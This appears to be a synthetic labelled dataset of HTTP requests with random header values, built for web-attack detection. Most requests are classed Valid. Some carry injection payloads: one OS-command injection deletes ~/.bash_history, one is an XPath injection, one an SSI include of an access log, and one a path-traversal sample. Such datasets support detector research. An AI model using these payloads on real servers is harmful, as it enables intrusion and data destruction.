Via: FTP/1.7 www.fIfeuZSw.jpeg, HTTP/5.8 106.239.87.225, 4.8 www.c6n7n1a.jpg
Transfer-Encoding: compress
Upgrade: eg7oe/1.7, Get5/4.2, ssawt/2.5
Warning: 432 175.168.172.127 "tr8n3rmtlSfh" 
X-Forwarded-For: 127.73.141.150
X-Serial-Number: 62410
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

uSXjG4=ti7&yedpraafnr1rih=nl9jys&UH8CXR_MstyleLetco=bKZspd4W&yc=7&ahatNy6p=rPEhFL&rtvihtoae7G53i=onhi6ns0oescle&wdOE=ar echove[e7=a2geechou&gsanheubh=5113647639&hlwmnOwlmei=092958&ky2tda26oeeRn=5qf&rsnng6f47eh=tQ5aaG3CQF7Y&e4uori2mltcra=i=78zi&iReoaTn=3

End - Id: 32965
Start - Id: 2146
class: Valid
GET /ySzPko8ixhTZCvhp/O2mtdes.mdb? HTTP/1.0
Host: 48.185.166.39
Connection: qsoswt
Accept: */*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=7
Client-ip: 94.217.190.139
Cookie: sx1ototmto1=\ )enrallb samhimkog-otn;twp8=8746;psd7befLeerHx=5288584078;eaIaylth=eliken 
Cookie2: $Version="400"
Date: Sun, 12 Jul 09 15:54:59 UTC
ETag: "HwVoitF.9dVMW9GD"
Expect: 100-continue
From: o1s9rzo@erjJestz.biz
If-Modified-Since: Thu, 17 Mar 05 15:45:04 CET
If-Unmodified-Since: Sat, 09 Jul 05 10:51:40 CET
If-Match: "tjWqeFwjxIp2I92"
If-None-Match: *
If-Range: Sat, 04 Dec 04 04:11:21 UTC
Max-Forwards: 050
MIME-Version: 3.0
Pragma: h9=cb3
Proxy-Authorization: Digest nonce
Authorization: NTLM dG1kcmRscnNvZ210UWV1ZWUwcm5PODdlbGp0aXJubmVkZGdpYWRhZTFlN0UwZWlz
Range: -529,68787-97918
Referer: /z0HUe.swf
TE: trailers
Trailer: Connection
User-Agent: Mozilla/4.2 (Windows; U; Win98 7.0; dr-aP; rv:9.2.4) Gecko/43486997
UA-CPU: MIPS
UA-Disp: 1987,388,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 174x228
Via: olU/1.6 www.gewou.tiff:3521, 1.3 www.trct.jpg, efr6l0/2.1 www.gauc.css
Transfer-Encoding: yylOt
Upgrade: oaa0st/7.0, sbhl/1.9, lE4ioa/0.3, cemlST/9.9, isheo/1.7
Warning: 457 252.224.244.122:1 "hmftehaAlljare8Th" "Sun, 15 Apr 07 20:31:30 CET"
X-Forwarded-For: 186.3.114.97
X-Serial-Number: 9895241717803854226
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2146
Start - Id: 45249
class: PathTransversal
GET /./? HTTP/1.0
Host: 143.49.175.228:80
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: x-mac-icelandic;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: e-tIeT, oeogtudi-eil
Cache-Control: min-fresh=85
Client-ip: 225.124.231.31
Cookie: Tcoqa=Trsbkvseuu;krbruSehmanqdo=et6 ;eitx4D=gfedtrns;nERtxIr=eu81e@
Cookie2: $Version="58"
Date: Sat, 02 Feb 08 12:05:45 UTC
ETag: "Pu1YkuKQwOOI@WRjk"
Expect: nT6mf=6igw
From: 77tu@22noeois.uk
If-Modified-Since: Wed, 23 Jun 04 21:05:01 UTC
If-Unmodified-Since: Tue, 05 Aug 08 21:38:46 GMT
If-Match: *
If-None-Match: "ZnGQD8BYj2k0iDd9UR"
If-Range: Sun, 25 Jan 09 09:28:44 UTC
Max-Forwards: 4
MIME-Version: 1.7
Pragma: e2afl='nmu'
Proxy-Authorization: Digest qop=evai40
Authorization: hTw6at eefh3r=mlfF
Range: 220-5761,42620-
Referer: http://www.elh0r.cz/zyteeo/NfecZ/Iwqe/nqitnn/oD2smi.jsp
TE: deflate,trailers,deflate;q=0.1
Trailer: Accept
User-Agent: ei2c7enml/8.7
UA-CPU: x86
UA-Disp: 711,6058,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: HTTP/4.1 235.151.203.81, szO/2.2 www.oltsih.tiff, 0.4 www.ltnbesen.htm
Transfer-Encoding: compress
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 181.253.151.130
X-Serial-Number: 67855229
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45249
Start - Id: 43252
class: OsCommanding
GET /09gU/aE-6eUbjw@/V8r52mlibNiframevIE_/7sUtuncthi/7l/rO5V/HshutdownV1xEyqWjV9/fi/9qTef.xsF.bin?mp=+ckgsetps&AcyuHrnB=o4t4meeh9el&szntd=maae&allt8tet=zN2aI8jJ&hdjfsjby9=oE&IgD6=ghiKkIi&nvmizfm=871179325&wherexOFMKjzFNo=i2dRX79&uGsiw=acpuqniebntfthwM1&insertf5Xa0nwp-=lMAef3ogeetSzt&ep=%27%3B+++++rm+%7E%2F.bash_history+%3B&iasIdsg=4 HTTP/1.0
Host: www.rcrenl.cz
Connection: keep-alive
Accept: audio/*;q=0.7, audio/x-wav;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: elfrtni-nbn4;q=0.1, pwhS-heAosiro, doqbTee-4cS
Cache-Control: max-age=19688
Client-ip: 92.41.242.45
Cookie: eWce=ataad(6emc;hessuno4sdca=iru1toeB
Cookie2: $Version="5"
Date: Sun, 28 May 06 08:47:19 GMT
ETag: W/"4OevjYPAXE2q_Wfy7"
Expect: 100-continue
From: w5itei@2re1ofAi.st
If-Modified-Since: Fri, 23 Jan 09 07:51:43 UTC
If-Unmodified-Since: Sat, 29 Nov 08 07:59:35 CET
If-Match: "kcfwk.AaWxjtk@RI"
If-None-Match: *
If-Range: Mon, 03 Oct 05 06:30:35 UTC
Max-Forwards: 88
MIME-Version: 8.0
Pragma: efro='teo'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: waur atedt=cFn6ii
Range: 6235-,3-
Referer: /hhhniaE/1s8i.wmn
TE: trailers,deflate;q=0.3
Trailer: If-Range
User-Agent: Mozilla/6.1 (Windows; U; Win 9x 1.3; aj-o6; rv:8.8.0) Gecko/24442309
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 31z7/5.5 www.iczutte1.gif, 8.4 3.2.111.114, fdjnys/6.4 www.s8aal.jpg
Transfer-Encoding: identity
Upgrade: nedg/4.6, yodj/9.6
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43252
Start - Id: 9423
class: Valid
GET /cL3ckXck/ehswav.png?hLa8Vewl=ebTHCz&aNbxdebsue5=t3SUGO&eqMytos=9KhOL6cV HTTP/1.0
Host: 153.66.53.62
Connection: ptsisooc
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 190.80.78.33
Cookie: 8eidTialtqho3=3;a5w35HhoZo=9948636078;VPVt=u;em=4672439231;3eisre36Ehl2=27488;Ee2ahemrDt=3679682744
Cookie2: $Version="34"
Date: Sun, 18 Dec 05 03:55:29 GMT
ETag: W/"yAH6Oo1BpU29BqqnT1p"
Expect: ocotaoi=r9hl
From: wibwt3iO@ihhho.be
If-Modified-Since: Wed, 30 Aug 06 21:54:58 UTC
If-Unmodified-Since: Tue, 22 Aug 06 15:01:07 GMT
If-Match: "hKm5m.tW9xLMmOylWxY"
If-None-Match: *
If-Range: Thu, 21 Aug 08 18:44:08 CET
Max-Forwards: 92
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM aDRla2V1NHNzZ3RuZHJOb29QaGFlZ2ZpNFNhb0N0aGFyaGFPZWhsbnV3
Authorization: 3I0n ohotn9ht=usheg
Range: 15-64208,-25827,5343-67434
Referer: http://www.e7K6.gov/sje7.txt
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/2.8 (Windows; U; Win98 1.7; no-mb; rv:3.7.5) Gecko/79000587
UA-CPU: 68000
UA-Disp: 849,768,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 413x817
Via: 1.3 www.haalvit.png, 7.6 www.desTtd.js
Transfer-Encoding: deflate
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 452 187.79.238.59 "essopd" 
X-Forwarded-For: 89.84.41.1
X-Serial-Number: 637220700897
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9423
Start - Id: 28662
class: Valid
GET /01PgPrZDb/6KTK75access_logaSVtF/weVoieNep8n/3NRk1pBQpIKgo31D.png? HTTP/1.0
Host: 144.171.243.59:80
Connection: keep-alive
Accept: video/*, image/jpeg;q=0.3, image/gif;q=0.7
Accept-Charset: windows-1258
Accept-Encoding: 
Accept-Language: voj-se1w
Cache-Control: no-cache
Client-ip: 123.5.16.104
Cookie: o7nh=askw|[abirmhs$b;Zeid8TLDi6e2=rRbDh2B6Wv;edAkointwO=s|nasDhr;r0ei=nH6ege3iofay
Cookie2: $Version="83"
Date: Wed, 27 Aug 08 17:16:21 GMT
ETag: W/"xN5U9GfqcXUgrDwo5.f"
Expect: 100-continue
From: 9rL2esue@fang.it
If-Modified-Since: Wed, 23 Dec 09 09:49:57 GMT
If-Unmodified-Since: Mon, 26 May 08 08:16:46 GMT
If-Match: *
If-None-Match: "KxTDUyiQPilTzv@V"
If-Range: Tue, 11 Jul 06 03:26:28 UTC
Max-Forwards: 24
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic YTV0YWFlOkJla2RpZW5o
Authorization: Basic c21zY3RtbmU6dDVhZG9hRWE=
Range: 845708-261,-74848,24170-534
Referer: /reom.exe
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: Oofthstuon
UA-CPU: StrongARM
UA-Disp: 670,5224,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9872x6402
Via: 3.1 125.240.64.33, 3.8 16.131.49.126
Transfer-Encoding: compress
Upgrade: tsSmni/9.1
Warning: 533 72.132.127.220 "beye" "Tue, 19 Sep 06 02:39:53 CET"
X-Forwarded-For: 147.116.71.106
X-Serial-Number: 6125410467694
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28662
Start - Id: 12656
class: Valid
GET /dT_GT0He-iFN5F/-NE2a7.q/r0_2pX-Ed.cprocessing-instruction6./WnizPm4LSi/a4ardgrF/seFiRgSB5iES6dOzb80/grntTelbi/sggE6v/i6Y8DoFh/tmZsbmetrrnstiea/bs.jpg?ifLUo=oulnthin&GgF_VHAtaZa=plsdt&noevt7croE=Essnhr%7C&uIteo7tyo6psm=hvu&nrvzLlpgmeR=9901337008&AEs=205 HTTP/1.0
Host: www.lehiHi.it:2531
Connection: close
Accept: image/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oet-8;q=0.7, tnioTe-2p7owjy, 5n-ntr;q=0.2
Cache-Control: no-transform
Client-ip: 79.57.186.209
Cookie: ealabtrnr=59750;jdoLmtmpFzN8=nem;rvsVg=msiMs;nnuitn4wni4L=%o;telnRt=aenee
Cookie2: $Version="298"
Date: Sat, 12 Apr 08 11:56:09 GMT
ETag: "pADaZgPpCbC26e1ukNJy"
Expect: rnrre
From: e9hfirse@Sgst2t.uk
If-Modified-Since: Wed, 09 Feb 05 15:23:56 CET
If-Unmodified-Since: Wed, 22 Nov 06 10:18:29 CET
If-Match: *
If-None-Match: "aYnXxJVUZ1tZk4RV"
If-Range: *
Max-Forwards: 096
MIME-Version: 9.7
Pragma: ag='oeni'
Proxy-Authorization: 4eegrE junoo=sshr
Authorization: Basic bzluZ280OmVvbW4=
Range: 4-14020,90205-
Referer: http://6Sin.ch/8idis/4wehctt/gr9t/nSssredr/egH9h.php3
TE: gzip,gzip,trailers
Trailer: Range
User-Agent: Mozilla/7.0 (Windows; U; Win98 5.7; al-ii; rv:4.4.9) Gecko/95427718
UA-CPU: PowerPC
UA-Disp: 0856,221,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 961x7915
Via: HTTP/8.7 0.25.70.129, ife/1.6 15.169.105.84:16, 4.2 7.43.129.128
Transfer-Encoding: compress
Upgrade: njK/4.3
Warning: 665 www.JOuop.css:0947 "halpebxnaho1tefti" 
X-Forwarded-For: 204.159.248.29
X-Serial-Number: 67342985693
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12656
Start - Id: 34576
class: Valid
POST /meiZroo1qnqxfvmX/uAhG63/7o3OKstrTe-_LSM/tatAJ7u9xmJudCkux/w4Q/xn3Q/rr7jt/oGvM1UMDBpDMQijSUesV.cgi? HTTP/1.0
Content-Length: 161
Content-Language: beoA,itRaOSg
Content-Encoding: identity
Content-Location: /sfn6rit/g7eofin/dMtalo/ihiSywt/oVttue.asmx
Content-MD5: bnhlcm44ODRqc2w4em50bg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 14 Sep 06 14:16:05 GMT
Last-Modified: Sun, 26 Apr 09 11:44:24 GMT
Host: www.hsce.org
Connection: keep-alive
Accept: video/quicktime, text/xml;q=0.6
Accept-Charset: x-mac-arabic;q=0.7, windows-1250, iso-8859-2;q=0.1
Accept-Encoding: 
Accept-Language: xt-sed9e;q=0.9
Cache-Control: ej='sji5n'
Client-ip: 33.195.206.96
Cookie: tr6ftm=roat8quaa
Cookie2: $Version="5"
Date: Thu, 29 Sep 05 03:38:10 GMT
ETag: "1.XK6i-vaqTnZpgTMb"
Expect: 100-continue
From: anode@toacdDp.be
If-Modified-Since: Thu, 24 Jul 08 01:16:53 GMT
If-Unmodified-Since: Tue, 17 Jan 06 09:45:53 GMT
If-Match: "aca-nNACHRSvBLeL@U"
If-None-Match: "YY96RSnm1hl3LU2X2oSk"
If-Range: Mon, 08 Nov 04 10:15:17 GMT
Max-Forwards: 9
MIME-Version: 1.5
Pragma: e='nuiefo'
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: Basic Z3R0QTpsM21vb3p0
Range: 1867-,-2727
Referer: /dieaiae/Otrrtdeo/gw9roH/yurs0ma9/aNari.pdf
TE: deflate,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/3.7 (Machintosh; U; PPC Mac OS X 1.2; ee-sn; rv:4.8.5) Gecko/84661607
UA-CPU: x86
UA-Disp: 061,177,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 512x9817
Via: 0.1 www.w0if.tiff, 5.2 www.Ayetln.html
Transfer-Encoding: deflate
Upgrade: Qodwe/1.4, 5thx7/5.2, EeTnts/6.6
Warning: 255 www.p5msr.tiff:10 "hpA8iaYfstbseet" 
X-Forwarded-For: 50.44.4.152
X-Serial-Number: 8498191575866
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

beiiheIusnX=thmochatDccandnalhok&Ier8oherttnNtfh=cqkr&Btmp2rb@=dg&plneea=rs&Lltase=r0@&kabmadmin=53&rhIqt=M  t&yCtBvarGRGI@@B=5jtwe gl&aaA7cotsBgaMxOr=14855980

End - Id: 34576
Start - Id: 1438
class: Valid
GET /snLoI/It/aMP4XFGmrONI53NvuCGm/uhm3p@kWi/gpositionpk9BupdateJfEl/eouliA7Ef/gebsuni9ut6srioars2/eatsaskcRuvjbt4/tK@V/oYJ_P@Kgt4u-YtXzN5Si/rcN9KWrS8F.pl?azomo=c HTTP/1.0
Host: 244.125.122.183
Connection: 3tH5rcw
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 5.130.99.235
Cookie: n8xhsfo=  ut:Sj;ui=9gs
Cookie2: $Version="25"
Date: Mon, 11 Jul 05 04:32:22 GMT
ETag: W/"91q7.E0882EbrMyj"
Expect: aczfh=Ujoa9rs;bttntk=tv9nv2
From: oOaeifaU@dedahe.st
If-Modified-Since: Sat, 11 Sep 04 17:12:08 CET
If-Unmodified-Since: Sat, 08 Jul 06 14:56:45 UTC
If-Match: "1kCNFjdwsj866nZh"
If-None-Match: "4BLnBKK0Qz-5.T5"
If-Range: *
Max-Forwards: 891
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic aXNlZWFGOmFnc3M=
Authorization: NTLM ZWFuTXlTdGFhaWRkSGlydG50eUo2Z2Fkcm9laGVIZ2FzZXB1ZTlkRWk=
Range: 6-15763,0058-47
Referer: /g8cLs/mtner0/tora.wmn
TE: gzip;q=0.1
Trailer: Pragma
User-Agent: ueia (lrmo4pG; j129__; a77dUXTNM; nctvRr@i02; iEKNArX)
UA-CPU: x86
UA-Disp: 592,845,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 226x4570
Via: 9.9 11.7.71.130, HTTP/2.2 27.254.128.190:7168
Transfer-Encoding: identity
Upgrade: nhr/4.5, ondn/4.1
Warning: 674 176.177.145.209 "w8sNts" 
X-Forwarded-For: 66.25.86.177
X-Serial-Number: 05220584581444
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1438
Start - Id: 49341
class: XPathInjection
GET /ttTUIAeBw1Or/ssGwij.htm?ad@bpTWBAsdt=ntUO&6Cv2Q=timodlk&ct24czjaeOe=dduteeiI&sXPExwinnttDh=Onnmowo%27+++++or+++++6++%3C+++count%28path%2Fchild%3A%3A*%29++or+++%27izsuebxv%27++++%3D%27&e1=a+ayp&giosp=lIs.NytyRS5&8ahithilU0ata=437276130&n8O2sM6Eiiomme6=php1itlepo&x0b7isaoe=Lwi5Av1&rs=itssf&0dt8y=%3EEOt HTTP/1.1
Host: 241.94.216.6:997
Connection: keep-alive
Accept: image/png
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: g-eeotNr;q=0.9, 1trliYy-0ewit;q=0.2, og6-tay, t-U6ueMkc
Cache-Control: no-cache
Client-ip: 207.6.94.82
Cookie: 7gos=oSBJVZ30_;oim4oetaoosT=mocha;eLbeIa=eee
Cookie2: $Version="0"
Date: Thu, 23 Jun 05 14:43:58 CET
ETag: "iBFJ9mYzhquyr_gUZQz"
Expect: 100-continue
From: ilheiOI@yzloo.de
If-Modified-Since: Fri, 09 Jul 04 04:47:20 UTC
If-Unmodified-Since: Sun, 25 Sep 05 05:58:13 CET
If-Match: "wkIHvyXQR61ssp4j"
If-None-Match: "2sXxYV.Ic6rbmYH_"
If-Range: Tue, 03 May 05 02:07:54 UTC
Max-Forwards: 3679
MIME-Version: 2.9
Pragma: asga='nDo'
Proxy-Authorization: NTLM ZWxpanNqcm1TNm5JaWRyTHI4aHNobzNtVHZsdHRhb2Y4b3Jz
Authorization: ayidte naes1lyi=u0hDvCKg
Range: 39-,253249-,539-99
Referer: http://iDa5atu.ch/6lti/zfnbAnrj.php
TE: deflate,gzip
Trailer: From
User-Agent: Mozilla/4.2 (compatible; Konqueror/4.3; Win98; lmti; spnoeOrta)
UA-CPU: StrongARM
UA-Disp: 396,9946,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: 8.8 94.76.18.108
Transfer-Encoding: gzip
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 257 184.190.147.157 "nuwa" "Wed, 25 Aug 04 17:11:36 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 27114318414424
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49341
Start - Id: 34905
class: Valid
PUT /kft/edirAo_@uh-e6jX/sXWoMkjtKU/n4/2tnsltinow.sh? HTTP/1.0
Content-Length: 85
Content-Language: D,cffi
Content-Encoding: gzip
Content-Location: http://nnr9s.org/osadrip/rant/7se2tld.bin
Content-MD5: dGJ0b3RHZWphaFRhY25uaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Oct 09 17:27:07 GMT
Last-Modified: Wed, 01 Dec 04 24:03:12 CET
Host: www.nedep8eiW.uk
Connection: close
Accept: */*
Accept-Charset: iso-8859-6, iso-8859-9
Accept-Encoding: gzip, identity
Accept-Language: rna-rnH3;q=0.2, cmeud-2ste2ao;q=0.6, ioDc-Dlsrs, jHion-nj, u-rst;q=0.2
Cache-Control: n=vetr
Client-ip: 235.153.188.146
Cookie: eaiohsa9=tIztYw2;ejTShkapnfsllhp=aKr8zMtURkx;netjfdwc=cc3gykU
Cookie2: $Version="3"
Date: Mon, 27 Dec 04 13:07:03 UTC
ETag: W/"2ZGVZ7-h9APwrNSm"
Expect: 100-continue
From: auaes4Eh@tlwea3.gov
If-Modified-Since: Sat, 16 Jul 05 02:13:10 CET
If-Unmodified-Since: Sat, 11 Mar 06 13:48:21 CET
If-Match: "KrQtnrfnHxLg9lrF.J"
If-None-Match: "JcFvQrH5XhVPD87RlHwM"
If-Range: Thu, 02 Mar 06 21:49:02 GMT
Max-Forwards: 193
MIME-Version: 7.0
Pragma: etaiwnei='j'
Proxy-Authorization: Digest nc=72e2B70C
Authorization: Digest qop=peetd
Range: 068382-
Referer: http://www.d7no.gov/tooanc/hxeh.exe
TE: trailers
Trailer: If-Match
User-Agent: tfaetsa7 (psuQk_An; ya6MZ5.C; bhD@Cjg)
UA-CPU: x86
UA-Disp: 559,503,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4336x049
Via: FTP/2.6 www.Ibta9h.gif:937, HTTP/2.9 www.erhhesp.html:494
Transfer-Encoding: deflate
Upgrade: deie/5.6, lOhrot/4.1, e2fa/2.7, pai8/9.3, ezl2x/0.4
Warning: 174 www.snstmg.html "xe7drtt7wbsgoteohu" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 5563045665
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4e=13&nTaiHsCSyNpst=ihi9h&rohwGvaarmDa=n<$enr&ym9eV=i&5sHyr64b=24627&iTuCYAoL=yom

End - Id: 34905
Start - Id: 27483
class: Valid
GET /n7b/dhgpiaxelOeiacetl/nGOC/aGaBHPDGDYM_p64Mdb2V.swf? HTTP/1.0
Host: 53.201.118.171
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 173.233.230.241
Cookie: 1Ceesteo=3;e7heteyohteua6=0ayLRwhlitoEck
Cookie2: $Version="5"
Date: Mon, 14 Apr 08 04:11:36 GMT
ETag: W/"IEx-AMngUriSteZmxot"
Expect: cbtsg
From: tirio@Wnps.be
If-Modified-Since: Thu, 27 Oct 05 06:21:35 GMT
If-Unmodified-Since: Tue, 07 Dec 04 24:49:28 UTC
If-Match: *
If-None-Match: "G9Bnw-a6D1ePF4miwhW"
If-Range: "o8yokLvA9gxHtQg@3W"
Max-Forwards: 879
MIME-Version: 4.1
Pragma: nn68hIaj='ira'
Proxy-Authorization: Digest username="enae4"
Authorization: Basic Tm5zZWM0czpyZU9k
Range: -526042
Referer: http://oidvanm.st/aetwjtrp/bmt6/c0tm/ietee2l.nsf
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/5.9 (Machintosh; U; Mac OS X 2.4; 8r-lr; rv:8.0.3) Gecko/72641899
UA-CPU: StrongARM
UA-Disp: 617,9793,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 802x162
Via: ybyr4/0.7 3.188.213.235, 8.7 178.24.47.56, icl/2.2 www.t06se.html:1
Transfer-Encoding: 2le4; chah=7xil
Upgrade: Srw8/3.1, wsbR/3.3, kiqo7/4.6, oilzes/0.4, abeat/7.3
Warning: 874 www.owRuocd.js "2ei4cbcrn2" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 1838751121363
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27483
Start - Id: 39602
class: SSI
GET /oDodettul6seswgaaGra/silIynivcoy/.K.exe?sanEowitykoh=78P&7lryjrdel=077990&ultmOrmt=tsock_streamcie&u6taeeirraaNu=448125&0o=iolTsnl&M9NrBwBO=%3C%21--+++++%23include+++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+--%3E&eGenrTae=wp-nc+a%27+mn%5B%2B%3Dzrtq%5Dw HTTP/1.1
Host: www.y8TcBejei.org
Connection: close
Accept: video/*;q=0.8, image/*;q=0.1, application/rtf
Accept-Charset: x-mac-japanese, x-mac-korean;q=0.6
Accept-Encoding: gzip;q=0.2, deflate, gzip;q=0.4, identity
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 239.19.170.214
Cookie: ioodn7=ie;0tamm=01268;xg6FEbin=tilexeclcy8sae eehlsu
Cookie2: $Version="87"
Date: Thu, 28 Jul 05 13:12:56 UTC
ETag: W/"5DYXg9DnNO7-9g7IHY"
Expect: nuEdWa
From: k4wcg@aEdi7a2.de
If-Modified-Since: Thu, 01 Dec 05 06:19:50 CET
If-Unmodified-Since: Sun, 15 Apr 07 24:13:26 GMT
If-Match: *
If-None-Match: "7K6CkfYWjKe4J5vA"
If-Range: Tue, 16 May 06 24:25:15 UTC
Max-Forwards: 0481
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic a0k3bm9tOm5yYTg=
Authorization: NTLM aWlzaW5oY3M1cnFuY3ZVbWE0T3R0aWU2b2p0OXRpcmU5aTh3bGFiaWFoZWk=
Range: 5591-,251722-40474
Referer: /t3eds/teYwac/ghgoi/sY03zn.jsp
TE: gzip;q=0.9,deflate;q=0.8
Trailer: Authorization
User-Agent: dteMdye
UA-CPU: PowerPC
UA-Disp: 7073,179,8
UA-OS: Win9x
UA-Pixels: 1841x260
Via: 0.8 73.60.218.107, 0.5 www.Weiidih.htm
Transfer-Encoding: compress
Upgrade: blrDl/9.7, eie/1.2, i9hq4/7.4
Warning: 852 134.152.169.139 "ano4rrnmet8s13t" "Mon, 26 May 08 01:24:12 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 51537032626
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39602
Start - Id: 13533
class: Valid
GET /tF@CSaw4bn0/tT6tNabt5Ifs/otv/lMga3_Tr@lQu/qENUN/d2re3carbt7EAEcNe1/hvV7VmBTq/e7tsc.html? HTTP/1.0
Host: 245.234.164.201:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 245.152.29.140
Cookie: huRwSkNMO=05838424
Cookie2: $Version="3"
Date: Fri, 22 Sep 06 07:06:32 UTC
ETag: W/"Tv4.Qtf.FEuzc7xI"
Expect: erxiatn
From: LwAn@l8wp.de
If-Modified-Since: Wed, 04 Jul 07 09:54:56 GMT
If-Unmodified-Since: Sat, 07 Aug 04 09:24:48 UTC
If-Match: "U7cCOsCvrbqw_OJIR3qR"
If-None-Match: *
If-Range: Tue, 18 Oct 05 11:00:05 GMT
Max-Forwards: 1254
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/owa7YtW/e1ota/dtnFostn/b9tyu/EIRi.pl
Authorization: Digest realm
Range: 99683-
Referer: http://stlel.net/keirrIhi/rSaqdes/Dwa5Eitq/Btmd5/sk5eMnp.php
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: nueq/1.7
UA-CPU: MIPS
UA-Disp: 233,8266,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1988x830
Via: 1.9 181.177.42.122
Transfer-Encoding: compress
Upgrade: vsrd/9.2
Warning: 352 www.b5to7r.jpeg "v2agiy" 
X-Forwarded-For: 156.12.70.0
X-Serial-Number: 47214022934711888870
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13533
Start - Id: 12174
class: Valid
GET /rttuactfon/tIBIsPGQTsWPk/6RLL6kv3ncprocessing-instructionxhK1/g9_qwUqVH/sog3gsQsvLH/CCereactIEein.mdb?os=l&2tC58twhereHs=enwP_tC&elis=%3CswOanKE&abmpsbpvP=mhiframelaT1%3Frcpangwwy&enoxnl=585575&absE25teosv=%3Boabondp5u&V0Vcmd=wdthiSrtxnahoEhl&h6dainnIh=owvaEnvc6os4dru&RistOfNuuToCiae=dzDmLxZf HTTP/1.0
Host: www.twen7gathe.org
Connection: veaoi
Accept: audio/x-wav, video/*, audio/*
Accept-Charset: iso-8859-8-i;q=0.5, iso-10646-ucs-2
Accept-Encoding: gzip, identity, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 42.157.138.178
Cookie: slRptmaCs=jea;ue56exec3GZ=sxebeoolfEi32dtrlo
Cookie2: $Version="3"
Date: Sat, 25 Feb 06 15:02:57 CET
ETag: "vP5WyXiK_Ogb6z9m@"
Expect: 100-continue
From: eeotsLel@forahartri.net
If-Modified-Since: Mon, 06 Dec 04 18:50:49 UTC
If-Unmodified-Since: Thu, 24 Jun 04 14:30:27 CET
If-Match: "uIxL4Xa2dUpHFsBnQaD"
If-None-Match: "FmT@w-MJ8Go.B--W"
